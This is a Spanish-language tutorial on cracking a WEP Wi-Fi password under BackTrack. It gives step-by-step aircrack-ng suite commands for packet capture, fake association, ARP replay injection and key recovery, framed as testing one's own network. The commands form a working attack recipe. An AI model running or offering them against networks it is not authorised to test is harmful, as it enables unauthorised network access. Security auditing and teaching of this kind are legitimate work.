Backtrack 2
Enviado por halfh • 10 de Agosto de 2013 • 333 Palabras (2 Páginas) • 321 Visitas
Una vez pulsado Enter saldrá una ventana con varias opciones a elegir, elegir las dos primeras de arriba que corresponden al Inicio con Resolucion 1024×768 o con la Resolucion 800×600. Una vez cargue el Sistema, saldrá una ventana de línea de comandos y debereis poner “startx” y empezará el modo gráfico.
Aquí empieza todo el proceso:
Abrir un terminal para ver que interfaz estamos usando, para ello escribid sin comillas:
“airmon-ng”
Una vez sepamos nuestro interfaz procedemos a escanear la red, volvemos a escribir en la misma terminal:
“airodump-ng wlan0″ (wlan0, ath0,…etc es el interfaz)
Cuando ya observemos que encuentra nuestra red, cancelamos el proceso con Tecla Ctrl + Tecla C, abrir una nueva terminal y escribimos en este caso para capturar balizas de señal (Beacons) y paquetes de datos (#Data/s):
“airodump-ng -w wep -c 11 –bssid ff:ff:ff:ff:ff:ff wlan0″
[airodump-ng -w (nombre del archivo que se creará, en nuestro caso wep) -c (canal) --bssid(bssid) interfaz] //es posible que no identifique la red y os pedirá que introduzcais el ESSID ( es el nombre de la red) en este caso pondremos [--essid nombre_de_la_red].
Los datos de el canal y bssid deben ser los de nuestra red wireless.
Atencion: no detener el proceso hasta que tengamos por lo menos 35.000 paquete de datos(#Data/s)
El siguiente paso es asociarnos a la red para ello abrimos una nueva terminal y escribimos (se puede hacer mientras está capturando paquetes) el siguente comando:
“aireplay-ng -1 0 -a ff:ff:ff:ff:ff:ff wlan0″
Una vez asociados en la misma terminal escribimos este comando para abrir/leer los paquetes capturados en el comando antes puesto que sigue corriendo:
“aireplay-ng -3 -b ff:ff:ff:ff:ff:ff wlan0″
Una vez obtenidos los 35.000 paquetes de datos como mínimo y leidos unos tantos miles tambien, procedemos a crackear la contraseña.
Primero debemos saber como se llama el fichero donde se ha almacenado, para ello en la terminal, escirbimos:
“dir” y copiamos el nombre del fichero .cap
Una vez realizado esto pasamos al último paso:
“aircrack-ng wep-01.cap”
Con este comando empezará a averiguar la contraseña de nuestra wireless, si no la saca es que tiene buena seguridad
...